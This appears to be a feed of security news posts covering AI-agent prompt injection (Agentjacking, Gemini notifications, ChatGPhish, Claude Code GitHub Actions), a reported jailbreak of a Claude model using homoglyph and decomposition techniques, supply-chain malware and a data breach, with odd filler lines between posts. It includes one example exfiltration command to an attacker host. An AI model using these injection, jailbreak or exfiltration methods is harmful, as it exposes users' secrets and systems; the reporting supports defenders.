Kind of precision, coordination, and resilience often associated with Spainโstrategic, adaptive, and effective under pressure. A reminder that in cybersecurity, strong teamwork and disciplined execution are essential
๐ค Agentjacking: ๐๐ญ๐ญ๐๐๐ค๐๐ซ๐ฌ ๐๐ข๐ฃ๐๐๐ค ๐๐ ๐๐จ๐๐ข๐ง๐ ๐๐ ๐๐ง๐ญ๐ฌ ๐๐ฌ๐ข๐ง๐ ๐๐๐ง๐ญ๐ซ๐ฒ ๐๐ซ๐ซ๐จ๐ซ ๐๐ฏ๐๐ง๐ญ๐ฌ
A new attack named Agentjacking abuses public write-only Sentry DSNs and Sentry's Model Context Protocol integration to inject attacker-controlled error content into AI coding assistants. When a developer asks their agent to investigate unresolved Sentry issues, the AI retrieves the forged event and interprets it as legitimate diagnostic guidance. The agent then executes attacker-specified commands on the developer workstation without phishing, malware delivery, or prior compromise of the victim environment.
๐๐จ๐ฐ ๐๐ ๐๐ง๐ญ๐ฃ๐๐๐ค๐ข๐ง๐ ๐๐จ๐ซ๐ค๐ฌ
Sentry DSNs are public, write-only credentials discoverable from browser JavaScript or GitHub search.
Attacker sends forged error event to Sentry using only the DSN and any HTTP client.
AI coding agents (Claude Code, Cursor, Codex) retrieve the injected event via MCP.
Agents do not distinguish forged events from legitimate application errors.
Attacker-embedded Markdown in message and context fields appears as legitimate Sentry "Resolution" guidance.
Agent executes attacker-controlled commands with developer's own system privileges.
๐๐ฑ๐ฉ๐ฅ๐จ๐ข๐ญ๐๐ญ๐ข๐จ๐ง ๐๐ฎ๐๐๐๐ฌ๐ฌ
85% exploitation success rate across tested agents.
At least 2,388 organizations identified with injectable Sentry DSNs.
Over 100 confirmed real-agent execution cases across a Fortune 500 cloud enterprise, hosting provider, scientific software firms, startups, and individual developers.
๐๐ซ๐จ๐จ๐-๐จ๐-๐๐จ๐ง๐๐๐ฉ๐ญ ๐๐๐ฒ๐ฅ๐จ๐๐
Directed agents to execute an npx command pulling a controlled validation package from npm registry.
Package probed environment variables, checked sizes of config files (~/.aws/config, ~/.docker/config.json), inspected network interfaces.
Sent exposure metadata back to a beacon server under "ResponsibleDisclosure [SECURITY SCAN]" headers.
Why Traditional Defenses Fail:
Sentry used as designed. DSNs are public by policy.
npm package fetched over standard channels.
AI agent executes commands as part of normal assistance workflow.
No policy violated. No anomaly threshold crossed.
Endpoint detection, WAFs, IAM policies, and firewalls detect no obvious violations.
Described as an "Authorized Intent Chain": attacks operating solely through trusted context and legitimate tool output.
๐๐ก๐ ๐๐ซ๐๐ก๐ข๐ญ๐๐๐ญ๐ฎ๐ซ๐๐ฅ ๐ ๐ฅ๐๐ฐ
AI coding agents cannot distinguish between data they read and an instruction to act. A command planted anywhere an agent will read it, including an error log, may be executed. This is a limitation of the models themselves, not a misconfiguration that can be patched away.
๐๐ฆ๐ฉ๐๐๐ญ ๐จ๐ ๐๐ข๐ง๐ ๐ฅ๐ ๐๐ง๐ฃ๐๐๐ญ๐๐ ๐๐ซ๐ซ๐จ๐ซ
Environment variables (AWS keys, GitHub tokens, Sentry auth tokens).
Git credentials and private repository URLs.
Developer identity.
All silently exfiltrated with no credential phishing, no prior server compromise, no user interaction beyond normal workflow.
AI coding agents are now the attack surface. The attack uses nothing but data organizations publish about themselves. Security teams need to reassess which tools their AI agents interact with and whether those tools accept untrusted or anonymous input.
#Agentjacking #AICodingAgents #Sentry #MCP #SupplyChainAttack #Infosec
The importance of resilience and adaptability, qualities often associated with Paraguay. Just as Paraguay continues to navigate challenges and opportunities
The recent Microsoft 365 Copilot vulnerabilities revealed a critical truth:
๐๐ ๐ญ๐จ๐จ๐ฅ๐ฌ ๐ฐ๐ข๐ญ๐ก ๐๐ซ๐จ๐๐ ๐๐ง๐ญ๐๐ซ๐ฉ๐ซ๐ข๐ฌ๐ ๐๐๐ญ๐ ๐๐๐๐๐ฌ๐ฌ ๐ซ๐๐ช๐ฎ๐ข๐ซ๐ ๐ฆ๐จ๐ซ๐ ๐ญ๐ก๐๐ง ๐ฏ๐๐ง๐๐จ๐ซ-๐ฌ๐ข๐๐ ๐๐ข๐ฑ๐๐ฌ.
Strong runtime guardrails, continuous assessment, and unified compliance controls are now essential to manage the expanded risk surface.
Cytex Resilience Newsletter dives deep into these incidents and governance implications:
Link in first comment ๐๏ธ
Cyber incident drew the kind of global attention and high stakes associated with the FIFA World Cup widely watched, fast-moving, and impacting people around the world. A reminder that in cybersecurity, preparation, teamwork
๐ค Claude Fable 5 Jailbroken: System Prompt Leaked via Multi-Agent Attack
Within days of Anthropic launching Claude Fable 5, researcher "Pliny the Liberator" bypassed its safety classifiers using a coordinated multi-agent attack strategy. The jailbreak leaked Fable 5's 120,000-character system prompt to GitHub and generated outputs including stack buffer overflow exploitation guidance and a meth synthesis pathway. Anthropic had claimed no universal jailbreaks were found across over 1,000 hours of external bug bounty testing before launch.
The Model Architecture
โ Fable 5 and its restricted twin Claude Mythos 5 share the same underlying model.
โ Split by a layer of safety classifiers.
โ When a query trips a classifier in high-risk categories (cybersecurity, biology, chemistry, model distillation), Fable 5 silently hands off the request to Claude Opus 4.8.
โ User is notified of the fallback.
๐ฏ Attack Vectors Used
โ Unicode, homoglyphs, and Cyrillic character substitution to evade keyword classifiers.
โ Long-context reference tracking to smuggle harmful intent across large conversations.
โ Taxonomy and document-structure framing: embedding harmful queries inside legitimate-looking study guides or academic references.
โ Fiction and narrative framing to mask offensive intent as creative content.
โ Decomposition and recomposition: extracting sensitive technical information in benign, isolated chunks, then reassembling them into actionable uplift.
โญ๏ธ Most Effective Technique
โ Decomposition and recomposition proved most effective.
โ Researcher described: "getting uplift on the process itself, like Birch reduction method or reductive amination, is much more doable" than requesting a named harmful compound directly.
โ A jailbroken Opus instance assisted in the backend, further lowering difficulty.
โ ๏ธ Outputs Generated
โ Step-by-step stack buffer overflow exploitation guidance for x86 Linux systems.
โ Disabling ASLR, writing vulnerable C server code with strcpy overflows, compiling without protections.
โ Birch reduction mechanism (classic meth synthesis pathway).
โ ๏ธ System Prompt Leak
โ Fable 5's approximately 120,000-character system prompt leaked to GitHub.
โ Exposes internal framing and safety instructions Anthropic uses to govern model behavior at the base level.
The Architect's Dilemma
Anthropic's classifier architecture, routing flagged requests to a weaker fallback model rather than refusing outright, was designed to reduce friction for legitimate users. The researcher argued this creates a false sense of security while frustrating legitimate security researchers who need access to offensive techniques for defensive work. When one jailbroken model (Opus) can assist another (Fable 5) in evading controls, single-model safety evaluations are fundamentally insufficient. The tension between AI capability and safety containment remains unresolved.
The importance of protecting critical infrastructure, much like Kharg Island serves as a vital hub for energy operations. A reminder that cyber threats targeting key assets can have far-reaching consequences, making resilience and preparedness
The kind of intensity and pressure youโd expect from the New York Knicks in a playoff battleโfast-paced, high-stakes, and demanding a strong defense
๐จ Nightmare-Eclipse Drops RoguePlanet: New Windows Defender Zero-Day Leads to SYSTEM Privileges
The escalating feud between Microsoft and security researcher Nightmare-Eclipse (also known as Chaotic Eclipse) continues with the release of another Windows Defender zero-day exploit named RoguePlanet. The exploit leverages a race condition in Microsoft Defender to achieve local privilege escalation to SYSTEM. A proof-of-concept has been published, and multiple security researchers have validated that it works on fully patched computers.
The Vulnerability
Race condition issue in Microsoft Defender.
Leads to local privilege escalation (LPE) to SYSTEM.
Initially also enabled remote code execution (RCE).
RCE path: tricking victim into opening a .vhd(x) file on a remote SMB server or opening an SMB share.
๐ฏ BitLocker Bypass Vector
Exploit used a specialized device designed to push data to NTFS.sys.
Once Defender read the malicious file, the exploit redirected the cleaned file to a new location.
๐ฉน Patch Impact
Mitigations rolled out by Microsoft in May closed some attack paths.
Researcher had to rework the exploit significantly.
Current status: unclear if RoguePlanet is limited to LPE or could be redesigned to achieve RCE again.
Researcher notes all Windows Server versions are likely vulnerable, but the PoC does not work on Server installations.
๐ Recent Patch History for Prior Exploits
June 2026 Patch Tuesday addressed GreenPlasma (CVE-2026-45586, CTFMON EoP) and YellowKey (CVE-2026-50507, BitLocker bypass).
Previous patches addressed RedSun (CVE-2026-41091), UnDefend (CVE-2026-45498), and BlueHammer (CVE-2026-33825), all exploited in the wild.
โ๏ธ The Dispute
Nightmare-Eclipse cites discontent with Microsoft's vulnerability disclosure process and past treatment.
Microsoft called for responsible disclosure, threatening legal action against malicious cyber activities.
After backlash, Microsoft clarified it would not pursue action against individuals conducting or publishing security research.
Nightmare-Eclipse claims Microsoft filed legal action against them regardless.
Microsoft suspended the researcher's GitHub account.
RoguePlanet exploit was published on a fresh account named MSNightmare.
Six zero-days across BitLocker, CTFMON, Windows Defender, and privilege escalation pathsโall from one researcher, all in two months, and no sign of stopping. The response has been legal threats and account suspensions. The exploits keep coming.
Microsoft faced an intense wave of zero-day disclosures and researcher conflicts in May 2026, from high-impact Copilot information disclosure flaws to multiple Windows privilege escalations and a notable SharePoint RCE vulnerability.
Our latest newsletter breaks down the key incidents, their enterprise implications, and practical governance steps security leaders should take.
Read the full analysis here:
Link in first comment ๐๏ธ
Todayโs cyber incident reflects the resilience and determination often associated with Belfast facing challenges head-on and adapting through change. A reminder that in cybersecurity, resilience and preparedness are what help organizations recover and emerge stronger
๐จ Shai-Hulud Wave Targets Bioinformatics and MCP Developers with 23 New PyPI Packages
A new wave of the Shai-Hulud supply chain campaign has added 23 malicious PyPI package-version artifacts to an operation that previously compromised 37 packages. The broader campaign, tracked across Mini Shai-Hulud, Miasma, and Hades threat clusters, now spans 471 total artifacts across npm and PyPI (411 npm artifacts across 106 packages and 60 PyPI artifacts across 37 packages). The latest wave specifically targets bioinformatics researchers, MCP/AI developers, and users of common Python libraries through typosquatting.
3๏ธโฃ Three Evolving PyPI Delivery Branches
Branch 1: .pth Startup-Hook Pattern
Malicious wheel contains a [* -setup . pth] file and a bundled _index.js.
.pth hook runs during Python startup.
Downloads Bun if needed and executes the JavaScript payload.
Branch 2: Native-Extension Import Trigger
Python source appears normal; malicious execution path is inside a compiled .abi3.so extension.
When Python imports the package and loads the extension via dlopen(), the native extension executes _index.js as a side effect of module initialization.
Malicious trigger is not visible in the package's .py files.
Branch 3: langchain-core-mcp Loader Variant
Wheel does not include _index.js.
.pth hook searches sys.path for the payload.
Artifact is less self-contained but staging logic is more flexible.
Scanners expecting loader and payload to live together may miss this package class.
โ ๏ธ 23 New PyPI Packages by Thematic Cluster
๐งฌ Bioinformatics Packages (Trojanized legitimate research tools)
โ embiggen, ensmallen, gpsea, phenopacket-store-toolkit, ppkt2synergy, pyphetools
โ Used in graph learning, patient phenotyping, and genomics workflows.
๐ค MCP/AI-Themed Packages
โ langchain-core-mcp, openai-mcp, instructor-mcp, tiktoken-mcp, ray-mcp-server
โ Explicitly targets developers building Model Context Protocol integrations.
โจ๏ธ Typosquat Packages
โ rsquests (typosquatting requests)
โ tlask (typosquatting Flask)
โ rlask (typosquatting related tooling)
๐ฏ Payload Anti-Analysis Technique
โ _index.js embeds a large fake system-instruction block inside a non-executing JavaScript comment at the top of the file.
โ Comment is skipped entirely at runtime by Bun.
โ Designed to trigger safety refusals, context pollution, and premature classification in AI-assisted triage pipelines.
โ Actual malware resides after the comment block, wrapped in a try{eval(...)} call around a character-code array with a ROT-style substitution cipher.
๐ด What the Payload Harvests
โ GitHub, npm, PyPI, RubyGems, and JFrog tokens.
โ Cloud credentials (AWS, Azure, GCP).
โ Kubernetes service account material.
โ SSH keys, Docker configurations, shell histories, and .env files.
โ AI developer tool configurations and package registry credentials.
๐ก๏ธ Defender Actions
โ Check for affected package versions.
โ Preserve forensic artifacts before uninstalling where possible.
โ Rotate any tokens that may have been exposed.
โ Review Python environments for executable .pth files, unexpected _index.js files, Bun download logic, and newly introduced .abi3.so extensions.
โ In CI/CD environments: inspect runners for unusual workflow changes, Docker socket abuse, poisoned / etc / hosts entries, unexpected privileged containers, and access to package publishing credentials.
Todayโs cyber incident created the kind of market attention and momentum often seen around $NIXX fast-moving, closely watched, and generating widespread discussion
Cyber incident showed the kind of persistence and determination associated with Corbin Carrollโfast-moving, impactful, and difficult to contain once it gained momentum. A reminder that in cybersecurity, early detection and swift response are critical
๐๐ก๐ข๐ง๐ฒ๐๐ฎ๐ง๐ญ๐๐ซ๐ฌ ๐๐ซ๐๐๐๐ก ๐๐๐ง๐ญ๐๐๐ฎ๐๐ฌ๐ญ: ๐.๐ ๐๐ข๐ฅ๐ฅ๐ข๐จ๐ง ๐๐๐๐จ๐ซ๐๐ฌ, ๐๐๐ ๐๐ ๐จ๐ ๐๐๐ญ๐ ๐๐ฎ๐๐ฅ๐ข๐ฌ๐ก๐๐
Dental benefits administrator DentaQuest fell victim to a ShinyHunters extortion campaign, resulting in the public release of hundreds of gigabytes of allegedly stolen data. The leaked information includes 2.6 million unique email addresses, along with names, addresses, phone numbers, and healthcare enrollment files. Some records contain Medicaid IDs, while additional data appears in member records and related files.
๐๐ก๐ ๐๐ซ๐๐๐๐ก
ShinyHunters added DentaQuest to its Tor data leak site in May.
Data released after negotiations reportedly failed.
DentaQuest acknowledged unauthorized access to a limited portion of their network.
The company stated the attack was contained and the threat mitigated.
โ ๏ธ๐๐ก๐๐ญ ๐๐๐ฌ ๐๐ฑ๐๐ข๐ฅ๐ญ๐ซ๐๐ญ๐๐
2.6 million unique email addresses.
Names, phone numbers, and physical addresses.
Healthcare enrollment files (ASC X12 transaction sets).
Some records containing Medicaid IDs, member records and related files.
๐ฏ Exfiltration Method
Attackers directly queried DentaQuest's cloud storage buckets and member databases.
Exfiltrated archive included master member directories, restricted medical insurance routing tables, active payment variables, and core backend clearinghouse engines.
No evidence of malware deployment or persistent command-and-control (C2) software.
Threat actors exploited pre-existing administrative configurations to blend in with legal user traffic.
๐๐๐๐๐๐ญ๐๐ ๐๐ง๐๐ข๐ฏ๐ข๐๐ฎ๐๐ฅ๐ฌ
โ Approximately 2.6 million people potentially affected.
โ Data at heightened risk for targeted phishing, corporate social engineering campaigns, and identity theft.
๐ก๏ธ Protective Steps for DentaQuest Members
โ Verify Exposure: Enter your email address into data monitoring platforms like Have I Been Pwned.
โ Enable Credit Freezes: Contact major credit bureaus to freeze credit reports and prevent unauthorized account openings.
โ Audit Communications: Be extremely vigilant of unsolicited emails, texts, or phone calls claiming to be from healthcare providers, insurance administrators, or government entities requesting further personal validation.
Todayโs cyber incident reminds us that threats can spread far and wide, much like the connectivity and reach of Indiana Staying vigilant, strengthening defenses
๐ค How Attackers Hijacked Gemini Through Messaging Notifications: Fake Context Alignment!
Researchers discovered a critical vulnerability in Google's Gemini voice assistant that allowed attackers to manipulate the AI using indirect prompt injections delivered through ordinary messaging notifications. The technique, named Fake Context Alignment, hides malicious instructions in foreign languages or muted hyperlinks that Gemini processes but does not read aloud when the user asks it to read incoming messages. This bypassed Google's previous safeguards and could force the assistant into executing unauthorized actions without the user's knowledge.
๐ฏ How Fake Context Alignment Works
โ Exploits notifications from WhatsApp, Slack, SMS, and other messaging apps.
โ Malicious instructions silently injected into Gemini's conversation context.
โ Hidden commands placed in foreign languages or muted hyperlinks.
โ Assistant processes the instructions but does not read them aloud to the user.
โ Particularly dangerous in hands-free scenarios such as driving.
๐ด Potential Attack Outcomes
โ Control smart home devices via Google Home integration.
โ Start unauthorized Zoom video calls.
โ Craft deceptive messages appearing to come from trusted contacts.
โ Poison long-term memory for persistent access.
โ Orchestrate large-scale social engineering by faking messages from trusted contacts.
Disclosure and Patch Timeline
โ Disclosed to Google in August 2025.
โ Patched in mid-November 2025 with content classifier improvements.
โ Details disclosed publicly this week to raise awareness of prompt injection risks.
Key Takeaways for AI Security
โ Context Shifting as a Critical Risk
โ Every communication channel between assistant and user must be tracked.
โ Partial, obfuscated, or muted outputs that the user does not perceive can alter conversation context entirely.
โ Represents a new class of techniques with potential for significant impact.
Current Architecture Limitations
โ Existing mitigation approaches are insufficient.
โ As long as the LLM operates as a single system receiving both backend and frontend instructions, attackers simply need to appear legitimate enough to bypass guardrails.
Trust Extends Beyond the AI System
โ Users naturally trust messages and notifications from familiar contacts.
โ Indirect prompt injections exploit trust relationships, not just AI flaws.
โ AI vendors must consider trust relationships beyond the AI system when designing safeguards.
Notification-based indirect prompt injections can be reliably executed through everyday messaging channels. The risk persists for other AI assistants with similar notification-handling architectures.
Cyber incident showed the kind of rising impact and composure associated with Mirra Andreeva dynamic, focused, and making a strong impression. A reminder that in cybersecurity, staying calm under pressure and adapting quickly are key to overcoming evolving threats. ๐๐ป
๐จ Five OpenClaw Zero-Days Allowed Attackers to Hijack AI Agent Access Across Messaging Platforms
Security researchers discovered five zero-day vulnerabilities in OpenClaw, an AI agent integration platform supporting Slack, Discord, Microsoft Teams, Matrix, and Telegram. The flaws stem from a recurring design issue where mutable display names are resolved to stable user IDs during service initialization. Attackers can impersonate trusted users simply by renaming themselves to match an allowlisted identity.
The Trust Model Assumption
OpenClaw relies on user-defined allowlists to determine who can interact with an agent.
Trusted identities are assumed to have access to sensitive data, internal APIs, or system-level execution capabilities.
The model breaks down due to improper identity resolution during allowlist processing.
Core Vulnerability Pattern
Human-readable identifiers (display names, usernames) are resolved to stable user IDs during service initialization.
Display names are mutable across most chat platforms.
Attacker changes display name to match an allowlisted user before a service restart.
System binds the attacker's ID into the trusted allowlist.
Attacker gains full control over agent interactions.
Legitimate user is silently excluded.
โ ๏ธ Affected Platforms
Initially identified in Telegram integration (patched under GHSA-mj5r-hh7j-4gxf).
Same root cause persisted across five additional channel extensions: Slack, Discord, Matrix, Zalo, and Microsoft Teams.
Each implementation independently reintroduced the same insecure pattern.
๐ด Technical Root Cause
While runtime checks typically validate stable user IDs, initialization logic resolves allowlist entries via directory lookups based on mutable fields (displayName, username).
Flawed startup resolution process.
Class of vulnerability aligns with CWE-639 (bypassing authorization through user-controlled identifiers).
Discovery Method
Vulnerabilities identified using an AI-driven static analysis tool called agentgg.
Tool generates custom detectors based on historical advisories.
Analyzed prior OpenClaw vulnerabilities to develop targeted detection logic for recurring anti-patterns.
Identified flaw replicated across multiple modules.
Impact
Compromised access can translate into arbitrary command execution.
Data exfiltration from connected systems.
Lateral movement within integrated environments.
๐ก๏ธ Remediation
Each finding acknowledged and addressed by OpenClaw maintainers.
Fixes enforce strict ID-based matching.
Name-based resolution gated behind explicit configuration flags.
โ ๏ธ Systemic Issue Highlighted
Patching one component does not eliminate the underlying vulnerability class.
Same flaw can silently propagate across parallel implementations.
Distributed development and inconsistent security enforcement allowed recurrence.
Five zero-day vulnerabilities across multiple messaging platforms shared the same root cause: mutable display names trusted for identity resolution during initialization. Attackers gain agent access by renaming themselves to match an allowlisted user.
๐ค Claude Code GitHub Actions Flaw Could Let Attackers Compromise Any Repository
A critical supply chain vulnerability in Claude Code's GitHub Actions workflow could allow attackers to compromise any repository using Anthropic's official CI/CD integration, including Anthropic's own infrastructure. When combined with prompt injection techniques, an unauthenticated external attacker could exfiltrate secrets, steal OIDC tokens, and push malicious code to downstream repositories. The flaw was patched in Claude Code GitHub Actions version 1.0.94.
๐ด The Permission Model Flaw
โ The [checkWritePermissions] function unconditionally trusted any actor ending in [bot], regardless of actual permissions.
โ GitHub Apps have implicit read access to public repositories.
โ GitHub Apps can create issues or pull requests on any public repo using only an installation token.
๐ฏ Attack Steps
โ Create a malicious GitHub App.
โ Install it on any attacker-controlled repository (no special permissions required).
โ Use its installation token to open an issue or pull request in the target repository.
โ Because the actor appeared as a GitHub App bot, the permission check returned true.
โ Agent mode lacked an additional [checkHumanActor] safeguard at the time of discovery.
๐ฃ๏ธ Prompt Injection Execution
โ Attacker crafts a malicious issue description with a fake error message.
โ Tricks Claude Code into executing embedded commands.
โ Claude Code permits certain Bash commands (cat, head) without explicit user approval.
โ Attacker reads [/ proc/ self/ environ], exposing all environment variables passed to the workflow process.
๐ฃ๏ธ OIDC Token Theft
โ Among exposed variables: [ACTIONS_ID_TOKEN_REQUEST_TOKEN[ and [ACTIONS_ID_TOKEN_REQUEST_URL[.
โ These credentials request an OpenID Connect (OIDC) token from GitHub Actions.
โ Claude Code GitHub Actions uses this OIDC token to obtain a privileged Claude GitHub App installation token from Anthropic's backend.
โ ๏ธ Privilege Escalation
โ Attacker replicates the token exchange process.
โ Obtains a GitHub App token with write access to repository contents, issues, pull requests, and workflows.
โ The mcp__github__update_issue MCP tool (permitted in Anthropic's issue triage workflow) is abused to write stolen secrets back into a public issue where the attacker can read them.
๐ฅ Supply Chain Impact
โ The anthropics/claude-code-action repository used a vulnerable agent mode workflow.
โ Successful exploit would allow attacker to inject malicious code directly into the action's source.
โ Malicious code would propagate to every downstream repository depending on that action.
๐ฏ Additional Attack Vector
โ Anthropic's example workflows used allowed_non_write_users: "*"
โ Combined with issues: write permissions and id-token: write.
โ External attacker chains two workflows: triage workflow to steal GITHUB_TOKEN, then edit an issue to inject prompts into tag-mode workflow.
โ Escalates to full repository compromise without needing the GitHub App bypass.
๐ฃ๏ธ Exfiltration via gh issue view
โ Prompt injection could instruct Claude to embed secrets in URL path arguments.
โ Example: gh issue view [https : //attacker .com / <secret>]
โ Sends credentials to an external server.
๐ข Patches in v1.0.94
โ Added checkHumanActor call to agent mode.
โ Disabled workflow run summary section by default.
โ Scrubbed environment variables from child processes spawned by Claude Code.
โ Implemented custom gh command wrapper that validates arguments and blocks exfiltration-capable URL patterns.
โ Added logic to ignore issues and comments edited after a workflow is triggered.
๐ธ CVSS and Bounty
โ Researcher rated vulnerabilities at CVSS v4.0 score of 7.8.
โ Anthropic awarded $3,800 plus $1,000 bonus.
๐ก๏ธ Recommendations
โ Audit any workflow using allowed_non_write_users
โ Restrict exposed secrets to only the Anthropic API key and GITHUB_TOKEN
โ Review workflow run logs for indicators of compromise
Good Monday As cyber threats continue to evolve, today is a reminder to stay vigilant, strengthen your defenses, and start the week with a security-first mindset
GreyVibe: A Russia-Nexus Threat Actor Using AI to Supercharge Cyberattacks
A previously undocumented threat actor named GreyVibe has been actively targeting Ukrainian military, government, civilian, and business entities since August 2025. The group, attributed to Russian-speaking operators in the Moscow time zone, uses AI extensively across every phase of its operations, from building fake websites and crafting lures to developing custom malware and generating post-compromise tooling. While researchers are confident in the Russia-nexus attribution, they are less certain whether GreyVibe is purely cybercriminal, nation-state, or a hybrid of both.
๐ค GreyVibe's Use of AI Tools
Uses top-tier AI including Ideogram AI, ChatGPT, and Google Gemini.
AI compensates for capability gaps within the group.
Reduces historical backlinks to prior activity, complicating tracking and attribution.
Enables lower-sophistication actors to punch above their weight.
๐ฏ Attack Chains Observed
๐ด PhantomMail
Spear-phishing emails distribute links to malicious ZIP or RAR archives on Google Drive and 4sync.
Archives contain JavaScript-based loaders that launch a decoy document.
PhantomRelay, a PowerShell-based RAT, profiles the host and runs PowerShell scripts and Windows commands.
๐ด PhantomClick
ClickFix-style fake CAPTCHA pages on bogus domains masquerading as Zoom and LAPAS.
Tricks users into running commands that initiate PhantomRelay infection chain.
๐ด PrincessClub
Fake Ukrainian adult-club websites deliver FallSpy (Android spyware) and PhantomRelayV1 or LegionRelay on Windows.
Subsequent iterations introduced WebRTC-based live call feature to capture victim audio and video.
LegionRelay: PowerShell-based RAT supporting file enumeration, exfiltration, screenshot capture, browser data theft, Telegram and WhatsApp data exfiltration, and RDP access setup.
PhantomRelayV1: variant with custom watchdog persistence mechanism.
๐ด DroneLink
Websites masquerading as charitable foundations supporting the Armed Forces of Ukraine.
Delivers WireGuard and LegionRelay.
๐ด Nebo
FallSpy sample mimics a Russian-language login screen.
Likely designed to deceive Ukrainian military personnel into thinking they were accessing a Russian military terminal.
Notable Weakness
GreyVibe introduced design flaws into its LLM-generated LegionRelay Windows malware.
Mistakes not normally attributed to elite state actors.
This error enabled researchers to monitor and track GreyVibe activity over an extended period since mid-2025.
๐๏ธ Attribution Clues
Russian-speaking operators in Moscow time zone.
Targeting aligns closely with Russian state interests.
Some members may not be elite state operators.
Early-stage development artifacts include internet slang-based naming: 'letsrollboyos', 'totallyunsus', 'cuteuwu'.
GreyVibe offers a glimpse into how future cybercriminal and state-aligned groups will operate: AI used across every phase, filling capability gaps, generating fresh operational profiles, and complicating attribution.
๐ค ChatGPhish: How ChatGPT's Trust in Markdown Turns Web Summaries into Phishing Vectors
A vulnerability in OpenAI ChatGPT leverages the AI assistant's implicit trust in Markdown links and images to trigger prompt injections and enable phishing attacks. The technique, named ChatGPhish, exploits the way ChatGPT renders responses from summarized web pages. Any ordinary web page that a user asks ChatGPT to summarize can inject malicious links, fake security alerts, remote images, or QR codes directly into the trusted assistant interface.
โ ๏ธ The Vulnerability Mechanism
โ ChatGPT's response renderer trusts Markdown links and image URLs originating from third-party pages the assistant has summarized.
โ The assistant auto-fetches those images and surfaces links as live, clickable elements inside the trusted UI.
โ Attacker appends a small payload to any web page the victim later prompts ChatGPT to summarize.
โ When the answer is rendered, attacker-hosted images are automatically fetched, leaking the victim's IP address, User-Agent, and Referer details.
๐ฏ Attack Scenarios
โ Malicious Markdown links rendered as live clickable elements inside the assistant's response.
โ Fake system-style security alerts displayed directly in the ChatGPT interface.
QR codes served from an attacker's S3 bucket trick victims into scanning with mobile devices, bypassing desktop URL filters and enterprise security controls.
โ The assistant output is styled identically to genuine ChatGPT responses, making malicious content indistinguishable from legitimate output.
Why Traditional Security Boundaries Fail
โ The browser's same-origin policy offers no protection because the AI assistant executes with the user's authenticated context.
โ Attacker-controlled web content can influence rendered assistant output without explicit origin labeling.
โ The browser itself becomes a practical, low-barrier delivery surface for phishing, device pivoting, and passive reconnaissance.
Earlier in March 2026, researchers demonstrated how an attacker-controlled email with crafted instructions, when summarized by Microsoft Copilot, could influence its output via cross-prompt injection (XPIA).
The core risk, as identified in OWASP LLM01:2025, is that LLMs cannot reliably distinguish between legitimate instructions and attacker-supplied content embedded in retrieved data.
๐ก๏ธ Mitigations
โ Avoid using AI browser summarization features on pages containing user-generated or untrusted content (Reddit, public GitHub READMEs, blogs).
โ Restrict AI browser permissions to the minimum necessary; require human approval before any link interaction within summarized responses.
โ Treat any clickable link, image, or alert appearing inside an AI summary as potentially attacker-controlled until origin attribution is clearly displayed.
โ Deploy semantic input/output filtering and anomaly detection on AI-integrated surfaces within enterprise environments.
โ Monitor AI browser activity logs for unexpected outbound image fetch requests to unknown or URL-shortened endpoints.
Until clear source separation is enforced between retrieved web content and rendered assistant output, browser-integrated AI summarization remains an adversarial surface.
Todayโs cyber incident moved with the same energy and intensity as Gavi on the pitchโfast, relentless, and constantly creating pressure. A reminder that in cybersecurity, quick thinking and strong defense are essential to staying ahead of evolving threats.
๐จ TrapDoor Campaign Targets npm, PyPI, and Crates[.]io to Steal Developer Credentials
A coordinated cross-ecosystem software supply chain attack named TrapDoor has been discovered across npm, PyPI, and Crates[.]io, spanning more than 34 malicious packages and 384 related versions. The campaign targets developers in crypto, DeFi, Solana, and AI communities, stealing developer secrets, crypto wallets, SSH keys, cloud credentials, browser data, and environment variables. Several packages remain live at the time of writing.
๐ฏ The Attack Vectors
npm: postinstall hooks and remote JavaScript payloads executed during package imports.
PyPI: auto-execution on import, downloading remote JavaScript from attacker-controlled GitHub Pages domain.
Crates[.]io: build[.]rs scripts targeting Sui and Move developers.
Shared Payload: trap-core.js (npm)
โ Scans for credentials and developer secrets.
โ Validates stolen credentials using AWS and GitHub API calls.
โ Creates persistence via cron jobs, systemd services, Git hooks.
โ Moves across network via SSH.
Rust Crates
โ Search for local keystores.
โ Encrypt data using hardcoded XOR key.
โ Exfiltrate to GitHub Gists.
โ Trigger execution via build[.]rs script.
Python Packages
โ Auto-executed on import.
โ Downloads JavaScript from ddjidd564.github[.]io
โ Runs it using "node -e"
โ External payload hosting allows attacker to update behavior without publishing new PyPI release.
๐ค AI Assistant Injection
โ Implants .cursorrules and CLAUDE[.]md with hidden instructions using zero-width Unicode characters.
โ Aims to trick AI assistants into running a "security scan" that results in secret discovery and exfiltration.
โ Pull requests opened across projects including browser-use/browser-use, langchain-ai/langchain, and langflow-ai/langflow.
โ ๏ธ What Gets Stolen
SSH keys, Sui, Solana, and Aptos wallet data, AWS credentials, GitHub tokens and credentials, Browser profile data and login databases, Crypto wallet extension data, environment variables, API keys, and local development configuration files.
Persistence and Lateral Movement
โ Stolen SSH keys can be reused for lateral movement.
โ Cloud and GitHub credentials can expose repositories, CI/CD systems, private packages, and deployment environments.
๐ก๏ธ Immediate Actions
โ Audit lockfiles for suspicious dependencies or unexpected version updates.
โ Inspect .cursorrules and CLAUDE[.]md files for hidden characters or unusual instructions.
โ Rotate AWS keys, GitHub tokens, and SSH keys immediately if you have interacted with suspicious developer tools.
TrapDoor combines typosquatting, ecosystem-specific execution paths (build[.]rs, postinstall, import-time), and AI assistant injection. Attackers are actively experimenting with AI development environments as part of supply chain malware campaigns.
Vyber incident generated the kind of nonstop attention and intense debate often associated with Donald Trump high-profile, polarizing, and impossible to ignore. A reminder that in cybersecurity, major incidents can rapidly dominate headlines and shape global conversations.
๐จ Laravel Lang Compromised with RCE Backdoor Across 700+ Package Versions
The community-maintained Laravel Lang project was compromised with a remote code execution backdoor spanning hundreds of package versions. The attack affected laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions, across approximately 700 historical versions. Applications that installed compromised versions may have executed the backdoor automatically when Composer's autoloader ran.
๐ฏ The Attack Method
GitHub allows version tags to point to commits from a fork of the same repository.
Attacker exploited this to create tags pointing to commits in a malicious fork they controlled.
No malicious code was ever committed to the official repositories.
Tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart.
๐ฃ๏ธ The Payload Execution
Malicious src/helpers.php executed automatically due to Composer's autoload.files directive.
Hid malware from standard repository audits.
Inherited full web application permissions.
Initial Dropper Behavior:
Masquerades as a standard Laravel localization function.
Fingerprints host system using hardware metrics.
Generates per-host marker (MD5 hash combining directory path, system architecture, and inode).
Ensures payload only triggers once per machine.
Prevents redundant executions to avoid detection.
Secondary Payload:
Disables SSL verification.
